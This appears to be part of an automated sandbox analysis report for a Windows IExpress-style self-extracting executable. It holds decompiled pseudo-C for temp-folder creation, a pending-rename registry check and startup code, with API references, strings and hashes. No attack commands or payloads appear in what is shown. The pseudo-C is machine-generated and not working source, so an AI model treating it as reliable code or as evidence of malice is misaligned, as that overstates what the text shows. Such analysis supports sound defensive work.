													if(_t48 != 0xffffffff) {
														goto L31;
													} else {
														goto L24;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L24:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L29:
															_t66 = _v268;
															goto L30;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L30:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L43;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L30;
																} else {
																	_t68 = E00F3685C( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L29;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L31:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00F35849( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L34:
																				_t50 = E00F3248E(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00F364E7(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xf39224;
																					E00F3158C(0xf39224, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00F3532F(0xf39224, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L12;
																					} else {
																						_t60 = _v268;
																						goto L43;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L43;
																				}
																			} else {
																				_t65 = E00F3248E(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L29;
																				} else {
																					_t67 = E00F35849( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L29;
																					} else {
																						goto L34;
																					}
																				}
																			}
																		} else {
																			goto L29;
																		}
																	}
																}
															}
														}
													} else {
														goto L23;
													}
												}
												goto L47;
												L43:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L44;
									} else {
										_t101 = 1;
										_t69 = E00F3532F(0xf39224, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L12;
										} else {
											_t82 = 0xf39224;
											_t70 = E00F3248E(0, 0xf39224, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L20;
											} else {
												_t101 = 1;
												_t82 = 0xf39224;
												_t71 = E00F3532F(0xf39224, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L12;
												} else {
													do {
														goto L20;
														L44:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00F35849(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0xf38a5f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00F3532F(0xf38a5e, 0, _t72);
							__eflags = _t73;
							if(_t73 == 0) {
								_t101 = 0x4be;
								E00F34327(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							} else {
								L12:
								_t38 = 1;
							}
						}
					} else {
						_t101 = 0x4b1;
						E00F34327(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0xf39a88 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E00F34327(0, 0x4b5, 0, 0, 0x10, 0);
					 *0xf39a88 = E00F3613C();
					L2:
					_t38 = 0;
				}
				L47:
				return E00F36C20(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x00f35472
0x00f35479
0x00f35490
0x00f3549c
0x00f354a0
0x00f354c7
0x00f354cc
0x00f354d1
0x00f354d3
0x00f354ff
0x00f35508
0x00f3550a
0x00f3550c
0x00f3550c
0x00f35513
0x00f35519
0x00f3551e
0x00f35520
0x00f35560
0x00f35566
0x00f35761
0x00f35769
0x00f3576e
0x00f35775
0x00f35777
0x00f3556c
0x00f3556c
0x00f35572
0x00000000
0x00f35578
0x00f35578
0x00f35583
0x00f35589
0x00f3558b
0x00f355b5
0x00f355b5
0x00f355c7
0x00f355cc
0x00f355d3
0x00f355d9
0x00f355e6
0x00f355e8
0x00f355eb
0x00f355f2
0x00f355f9
0x00f355ff
0x00f35602
0x00000000
0x00000000
0x00000000
0x00000000
0x00f355ed
0x00f355ed
0x00f355f0
0x00f35604
0x00f35604
0x00f35607
0x00f3562d
0x00f3562d
0x00000000
0x00f35609
0x00f35609
0x00f3560f
0x00f35611
0x00f35633
0x00f35633
0x00f35635
0x00000000
0x00f35613
0x00f35613
0x00f35615
0x00000000
0x00f35617
0x00f3561d
0x00f35622
0x00f35624
0x00000000
0x00f35626
0x00f35626
0x00f3562b
0x00f35640
0x00f35640
0x00f35643
0x00f3564a
0x00f3564f
0x00f35651
0x00f35674
0x00f3567a
0x00f3567f
0x00f35681
0x00f3568f
0x00f3568f
0x00f3569f
0x00f356a5
0x00f356b1
0x00f356b7
0x00f356ba
0x00f356cc
0x00f356cc
0x00f356bc
0x00f356c4
0x00f356c4
0x00f356cf
0x00f356d1
0x00f356f2
0x00f356f8
0x00f356ff
0x00f3570d
0x00f35713
0x00f35717
0x00f3571c
0x00f3571e
0x00000000
0x00f35724
0x00f35724
0x00000000
0x00f35724
0x00f356d3
0x00f356d9
0x00f356db
0x00f356e1
0x00000000
0x00f356e1
0x00f35653
0x00f35659
0x00f3565e
0x00f35660
0x00000000
0x00f35662
0x00f3566b
0x00f35670
0x00f35672
0x00000000
0x00000000
0x00000000
0x00000000
0x00f35672
0x00f35660
0x00000000
0x00000000
0x00000000
0x00f3562b
0x00f35624
0x00f35615
0x00f35611
0x00000000
0x00000000
0x00000000
0x00f355f0
0x00000000
0x00f3572a
0x00f3572a
0x00f3572a
0x00f355d9
0x00000000
0x00f3558d
0x00f3558f
0x00f35593
0x00f35598
0x00f3559a
0x00000000
0x00f3559c
0x00f3559c
0x00f3559e
0x00f355a3
0x00f355a5
0x00000000
0x00f355a7
0x00f355a8
0x00f355aa
0x00f355ac
0x00f355b1
0x00f355b3
0x00000000
0x00f355b5
0x00f355b5
0x00000000
0x00f35732
0x00f3573e
0x00f35744
0x00f35748
0x00f35749
0x00f3574f
0x00f35754
0x00f35754
0x00000000
0x00f3575c
0x00f355b3
0x00f355a5
0x00f3559a
0x00f3558b
0x00f35572
0x00f35522
0x00f35522
0x00f35524
0x00f35530
0x00f35530
0x00f35526
0x00f35526
0x00f3552c
0x00f3552e
0x00000000
0x00000000
0x00f3552e
0x00f35533
0x00f3553a
0x00f3553f
0x00f35541
0x00f3554f
0x00f35556
0x00000000
0x00f35543
0x00f35543
0x00f35543
0x00f35543
0x00f35541
0x00f354d5
0x00f354da
0x00f354e1
0x00f354e7
0x00f354ed
0x00000000
0x00f354ed
0x00f354a2
0x00f354a7
0x00f354ae
0x00f354b8
0x00f354bd
0x00f354bd
0x00f354bd
0x00f35779
0x00f35789

APIs

Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552

LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,00000001,00000000), ref: 00F35496
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00F354FF
LocalFree.KERNEL32(00000000), ref: 00F35513

Part of subcall function 00F34327: LocalAlloc.KERNEL32(00000040,?), ref: 00F3441B
Part of subcall function 00F34327: MessageBeep.USER32(00000000), ref: 00F344D3
Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F3450A
Part of subcall function 00F34327: LocalFree.KERNEL32(00000000), ref: 00F34513

LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F354E7

Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9

Part of subcall function 00F3613C: GetLastError.KERNEL32(00F35A9A), ref: 00F3613C

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F35583
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00F355E0
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00F355F9
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00F3568F
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00F356B1
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00F356C4
SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00F356F2
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00F3573E

Part of subcall function 00F3532F: GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35391
Part of subcall function 00F3532F: CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F353FF
Part of subcall function 00F3532F: RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35431

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F35578, 00F3557D, 00F356FF
RUNPROGRAM, xrefs: 00F35484, 00F354C7
<None>, xrefs: 00F354F9
msdownld.tmp, xrefs: 00F35695
Z, xrefs: 00F355CC
A:\, xrefs: 00F355B6

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLocal$AttributesFileFreeMessage$AllocCreateResourceWindows$BeepDriveErrorFindInfoLastLoadPathRemoveSizeofStringSystemTempTypelstrcmp
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 1841065146-3855382519
Opcode ID: aabb1af3a4140e40f19b51c65e8e2877ff7b1ec2801834ad0e086e4d0775eb65
Instruction ID: 89a7a5ff1c32e0e823516eb8e90673535a9ef7fe31743cd94247f6e523512e2e
Opcode Fuzzy Hash: aabb1af3a4140e40f19b51c65e8e2877ff7b1ec2801834ad0e086e4d0775eb65
Instruction Fuzzy Hash: 67813BB1E0461857DB649B319C46BFA726E9BD0B70F440065F8C6D3151EFB8DDC2BA11

Uniqueness

Uniqueness Score: -1.00%

Function 00F35253, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 72
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00F35253(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				CHAR* _v272;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t8;
				long _t16;
				int _t17;
				void* _t23;
				CHAR* _t32;
				void* _t33;
				signed int _t35;
				void* _t36;

				_t8 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t8 ^ _t35;
				_t23 = 0;
				_v272 = __ecx;
				_t32 = __edx;
				_t33 = 0;
				while(1) {
					E00F31524( &_v268, 0x104, "IXP%03d.TMP", _t23);
					_t36 = _t36 + 0x10;
					_t23 = _t23 + 1;
					E00F31485(_t32, 0x104, _v272);
					E00F364E7(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t16 = GetFileAttributesA(_t32); // executed
					if(_t16 == 0xffffffff) {
						break;
					}
					if(_t23 < 0x190) {
						continue;
					}
					L3:
					if(GetTempFileNameA(_v272, "IXP", 0, _t32) != 0) {
						_t33 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00F36C20(_t33, _t23, _v8 ^ _t35, 0x104, _t32, _t33);
				}
				_t17 = CreateDirectoryA(_t32, 0); // executed
				_t33 = 0;
				if(_t17 == 0) {
					goto L3;
				}
				_t33 = 1;
				 *0xf38940 = 1;
				goto L5;
			}

0x00f3525e
0x00f35265
0x00f3526b
0x00f3526d
0x00f35273
0x00f35275
0x00f35277
0x00f35289
0x00f3528e
0x00f35298
0x00f3529f
0x00f352b2
0x00f352b8
0x00f352bf
0x00f352c8
0x00000000
0x00000000
0x00f352d0
0x00000000
0x00000000
0x00f352d2
0x00f352e8
0x00f352ed
0x00f352ee
0x00f352f7
0x00f352f7
0x00f352fd
0x00f3530f
0x00f3530f
0x00f35315
0x00f3531b
0x00f3531f
0x00000000
0x00000000
0x00f35321
0x00f35322
0x00000000

APIs

Part of subcall function 00F31524: _vsnprintf.MSVCRT ref: 00F31556

RemoveDirectoryA.KERNELBASE(?,?,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352B8
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352BF
GetTempFileNameA.KERNEL32(?,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352E0
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352EE
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352F7
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35315

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F35269
IXP%03d.TMP, xrefs: 00F35278
IXP, xrefs: 00F352D5

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-3862032828
Opcode ID: 10b52002673bcde1f5aa14fa89c73e017481d934160adbc25c565a52c53f7417
Instruction ID: ad8c93980ad367b908e704a88f9e34ac718eebf086f2d1cad99bb007a68b92ce
Opcode Fuzzy Hash: 10b52002673bcde1f5aa14fa89c73e017481d934160adbc25c565a52c53f7417
Instruction Fuzzy Hash: 9C110FB160021867D724DB759C89BBF7779EBC5B70F104154F585D2190CB748C45BA91

Uniqueness

Uniqueness Score: -1.00%

Function 00F323CE, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73
registryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00F323CE(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t25;
				void* _t27;
				int _t30;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t30 = 0;
				if(_t13 == 0) {
					_t30 = E00F3233C(_t27);
				} else {
					if(_t13 == 1) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L6;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L5;
						}
						L11:
					} else {
						if(_t13 + 0xfffffffe <= 1) {
							_v8 = 0;
							_t25 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t25 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L5:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L6:
							_t30 = _v8;
						}
					}
				}
				return _t30;
				goto L11;
			}

0x00f323d3
0x00f323d4
0x00f323d6
0x00f323d9
0x00f323dd
0x00f32480
0x00f323e3
0x00f323e6
0x00f32444
0x00f32460
0x00000000
0x00f32462
0x00f32473
0x00000000
0x00f32473
0x00000000
0x00f323e8
0x00f323ee
0x00f323f7
0x00f3240b
0x00f32413
0x00f32424
0x00f3242a
0x00f3242f
0x00f32433
0x00f32436
0x00f32436
0x00f3243c
0x00f3243c
0x00f3243c
0x00f323ee
0x00f323e6
0x00f32488
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00F33EEC,00F33EEC,?,00F31D00,00000001,00000000,?,?,00F33F92,?), ref: 00F3240B
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00F33EEC,?,00F31D00,00000001,00000000,?,?,00F33F92,?,00F33EEC), ref: 00F32424
RegCloseKey.KERNELBASE(?,?,00F31D00,00000001,00000000,?,?,00F33F92,?,00F33EEC), ref: 00F32436
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00F33EEC,00F33EEC,?,00F31D00,00000001,00000000,?,?,00F33F92,?), ref: 00F32458
RegQueryInfoKeyA.ADVAPI32 ref: 00F32473

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 00F32401
PendingFileRenameOperations, xrefs: 00F3241C
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00F3244E

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: ca9f748b9ef0f45071d53c3ca70c1f55c0a583544e7018a53f06e0901f19ecd7
Instruction ID: 59af907b38f202013b5063ffe5474d0b09e7234169596a1c18249fe4d436b0e4
Opcode Fuzzy Hash: ca9f748b9ef0f45071d53c3ca70c1f55c0a583544e7018a53f06e0901f19ecd7
Instruction Fuzzy Hash: 42118F75A42228FB9B24DBA2DC0DEEFBE6CEF017B1F100155B908E2152D6358E01F6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F369D0, Relevance: 13.6, APIs: 9, Instructions: 137
sleepCOMMON

Download Yara Rule

C-Code - Quality: 50%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t30;
				void* _t33;
				signed int _t34;
				int _t35;
				signed int _t43;
				signed int _t48;
				signed char _t49;
				signed int _t61;
				signed int _t63;
				intOrPtr* _t64;
				void* _t65;
				void* _t70;
				void* _t71;

				E00F375A8();
				_push(0x5c);
				_push(0xf37900);
				E00F37674(__ebx, __edi, __esi);
				 *(_t65 - 0x24) =  *(_t65 - 0x24) & 0x00000000;
				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
				GetStartupInfoA(_t65 - 0x6c);
				 *(_t65 - 4) = 0xfffffffe;
				 *(_t65 - 4) = 1;
				_t61 =  *( *[fs:0x18] + 4);
				_t63 = 0;
				while(1) {
					_t48 = _t61;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t61) {
						Sleep(0x3e8);
						continue;
					} else {
						_t63 = 1;
					}
					break;
				}
				_t70 =  *0xf388f0 - 1; // 0x2
				if(_t70 != 0) {
					__eflags =  *0xf388f0;
					if(__eflags != 0) {
						 *0xf38224 = 1;
						goto L12;
					} else {
						 *0xf388f0 = 1;
						_t43 = E00F36BCA(_t48, 0xf3100c, 0xf31018); // executed
						__eflags = _t43;
						if(__eflags == 0) {
							goto L12;
						} else {
							 *(_t65 - 4) = 0xfffffffe;
						}
					}
				} else {
					_push(0x1f);
					L00F3742A();
					L12:
					_t71 =  *0xf388f0 - 1; // 0x2
					if(_t71 == 0) {
						_push(0xf31008);
						_push(0xf31000);
						L00F37668();
						 *0xf388f0 = 2;
					}
					if(_t63 == 0) {
						 *0xf388ec = 0;
					}
					_t74 =  *0xf388f8;
					if( *0xf388f8 != 0 && E00F374A0(_t74, 0xf388f8) != 0) {
						_t64 =  *0xf388f8; // 0x0
						 *0xf3a290(0, 2, 0);
						 *_t64();
					}
					_t63 =  *_acmdln;
					 *(_t65 - 0x20) = _t63;
					_t61 =  *(_t65 - 0x24);
					while(1) {
						_t49 =  *_t63;
						if(_t49 > 0x20 || _t49 != 0 && _t61 != 0) {
							goto L31;
						} else {
							goto L23;
						}
						while(1) {
							L23:
							_t33 =  *_t63;
							if(_t33 == 0 || _t33 > 0x20) {
								break;
							}
							_t63 = _t63 + 1;
							 *(_t65 - 0x20) = _t63;
						}
						__eflags =  *(_t65 - 0x40) & 0x00000001;
						if(( *(_t65 - 0x40) & 0x00000001) == 0) {
							_t34 = 0xa;
						} else {
							_t34 =  *(_t65 - 0x3c) & 0x0000ffff;
						}
						_push(_t34);
						_t35 = E00F32A7E(0xf30000, 0, _t63); // executed
						 *0xf38220 = _t35;
						__eflags =  *0xf38238;
						if( *0xf38238 == 0) {
							exit(_t35); // executed
							goto L31;
						}
						__eflags =  *0xf38224;
						if( *0xf38224 == 0) {
							__imp___cexit();
						}
						 *(_t65 - 4) = 0xfffffffe;
						goto L40;
						L31:
						__eflags = _t49 - 0x22;
						if(_t49 == 0x22) {
							__eflags = _t61;
							_t18 = _t61 == 0;
							__eflags = _t18;
							_t61 = 0 | _t18;
							 *(_t65 - 0x24) = _t61;
						}
						_t30 = _t49 & 0x000000ff;
						__imp___ismbblead(_t30);
						__eflags = _t30;
						if(_t30 != 0) {
							_t63 = _t63 + 1;
							__eflags = _t63;
							 *(_t65 - 0x20) = _t63;
						}
						_t63 = _t63 + 1;
						 *(_t65 - 0x20) = _t63;
					}
				}
				L40:
				return E00F376BC(1, _t61, _t63);
			}

0x00f369d0
0x00f369df
0x00f369e1
0x00f369e6
0x00f369eb
0x00f369ef
0x00f369f7
0x00f369fd
0x00f36a07
0x00f36a10
0x00f36a13
0x00f36a15
0x00f36a1a
0x00f36a1e
0x00f36a24
0x00000000
0x00000000
0x00f36a28
0x00f36a43
0x00000000
0x00f36a2a
0x00f36a2a
0x00f36a2a
0x00000000
0x00f36a28
0x00f36a2c
0x00f36a32
0x00f36a4b
0x00f36a52
0x00f36a74
0x00000000
0x00f36a54
0x00f36a54
0x00f36a64
0x00f36a6b
0x00f36a6d
0x00000000
0x00f36a6f
0x00f36bb3
0x00f36bba
0x00f36a6d
0x00f36a34
0x00f36a34
0x00f36a36
0x00f36a7a
0x00f36a7a
0x00f36a80
0x00f36a82
0x00f36a87
0x00f36a8c
0x00f36a93
0x00f36a93
0x00f36a9f
0x00f36aa8
0x00f36aa8
0x00f36aaa
0x00f36ab1
0x00f36ac8
0x00f36ad0
0x00f36ad6
0x00f36ad6
0x00f36add
0x00f36adf
0x00f36ae2
0x00f36ae5
0x00f36ae5
0x00f36aea
0x00000000
0x00000000
0x00000000
0x00000000
0x00f36af4
0x00f36af4
0x00f36af4
0x00f36af8
0x00000000
0x00000000
0x00f36afe
0x00f36aff
0x00f36aff
0x00f36b04
0x00f36b08
0x00f36b12
0x00f36b0a
0x00f36b0a
0x00f36b0a
0x00f36b13
0x00f36b1c
0x00f36b21
0x00f36b26
0x00f36b2d
0x00f36b30
0x00000000
0x00f36b30
0x00f36b8f
0x00f36b96
0x00f36b98
0x00f36b9e
0x00f36ba3
0x00000000
0x00f36b36
0x00f36b36
0x00f36b39
0x00f36b3d
0x00f36b3f
0x00f36b3f
0x00f36b42
0x00f36b44
0x00f36b44
0x00f36b47
0x00f36b4b
0x00f36b52
0x00f36b54
0x00f36b56
0x00f36b56
0x00f36b57
0x00f36b57
0x00f36b5a
0x00f36b5b
0x00f36b5b
0x00f36ae5
0x00f36bbf
0x00f36bc4

APIs

GetStartupInfoA.KERNEL32(?), ref: 00F369F7
_amsg_exit.MSVCRT ref: 00F36A36
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,00F37900,0000005C), ref: 00F36A43
_initterm.MSVCRT ref: 00F36A8C
__IsNonwritableInCurrentImage.LIBCMT ref: 00F36AB8
exit.KERNELBASE ref: 00F36B30
_ismbblead.MSVCRT ref: 00F36B4B

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 359039474-0
Opcode ID: 09560459b10378328f39a682401fa1d017ac8fe25d0d2f62e2c374b28a15fa9f
Instruction ID: 25407580d03b94fbd0722b82f4916893a3217a42dfeecb9a4440a49b36123720
Opcode Fuzzy Hash: 09560459b10378328f39a682401fa1d017ac8fe25d0d2f62e2c374b28a15fa9f
Instruction Fuzzy Hash: B341EF71D44319EFDB20AF64DC1576AB7A1BB48771F208119E841E72D1CBB88841FA55

Uniqueness

Uniqueness Score: -1.00%

Function 00F3578F, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00F3578F(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00F31485(_t20, _t36, _t33);
					E00F364E7(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0xf39a88 = 0;
							_t14 = 1;
						}
					}
				} else {
					E00F34327(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0xf39a88 = E00F3613C();
					_t14 = 0;
				}
				return _t14;
			}

0x00f35794
0x00f35798
0x00f3579a
0x00f3579c
0x00f3579f
0x00f3579f
0x00f357a1
0x00f357a2
0x00f357a8
0x00f357b4
0x00f357b8
0x00f357e5
0x00f357f3
0x00f3580a
0x00f35811
0x00f35814
0x00f3581a
0x00f35820
0x00000000
0x00f35822
0x00f35823
0x00f3582a
0x00f35833
0x00000000
0x00f35839
0x00f3583b
0x00f35841
0x00f35841
0x00f35833
0x00f357ba
0x00f357c8
0x00f357cd
0x00f357d2
0x00f357d7
0x00f357d7
0x00f357df

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00F353F6,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F357AE
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00F353F6,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F3580A
LocalFree.KERNEL32(00000000,?,00F353F6,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35814
